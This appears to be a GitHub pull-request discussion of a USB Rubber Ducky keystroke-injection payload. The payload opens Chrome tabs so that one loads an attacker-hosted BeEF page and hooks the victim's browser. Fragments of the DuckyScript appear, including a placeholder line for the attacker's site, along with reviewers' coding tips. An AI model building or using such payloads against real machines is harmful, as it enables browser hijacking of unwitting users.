Wino willy BeEF Injection #441
Conversation
Hello, Long time listener, first time caller. I came up with this payload when I was trying to figure out a quick way to hook a browser using the BeEF framework. The premise is pretty simple, it opens a bunch of Chrome tabs and the idea being that one of them is the attackers hosted ip/domain. I chose to write in DS 1.0 so it is as backwards compatible as possible. Anyways I read the submission guidelines carefully so let me know if I'm off in any way. Any and all help is much appreciated. Sincerely, \/\/1/\/0 \/\/1|_|_Y
Missed a few grammatical errors
|
|
||
| DELAY 1000 | ||
| GUI ENTER | ||
| DELAY 500 |
There was a problem hiding this comment.
If you have a majority delay you can use something like DEFAULT_DELAY to have a set delay for each action, for example having DEFAULT_DELAY 500 would add a DELAY 500 to every action unless otherwise stated in script.
|
|
||
| REM Enter your domain/ip site below. | ||
| DELAY 1000 | ||
| STRINGLN <link to your site> |
There was a problem hiding this comment.
use a DEFINE at the top of the payload to make it easier for a user to configure the payload.
for example you can do
DEFINE #URL example.com
at the top of the payload and then do
STRINGLN #URL
Even though define was introduced in DuckyScript 3 and Payload Studio marks it as such, it is DuckyScript 1 compatible.
| DELAY 1000 | ||
| STRINGLN www.youtube.com | ||
| DELAY 1500 | ||
| CTRL t |
There was a problem hiding this comment.
I see these 3 lines are repeated a lot: Consider using a FUNCTION
https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/functions
hak5peaks
added
pending requested changes
dallaswinger
removed
pending requested changes
Hello,
please read the previous commit.
Thank you.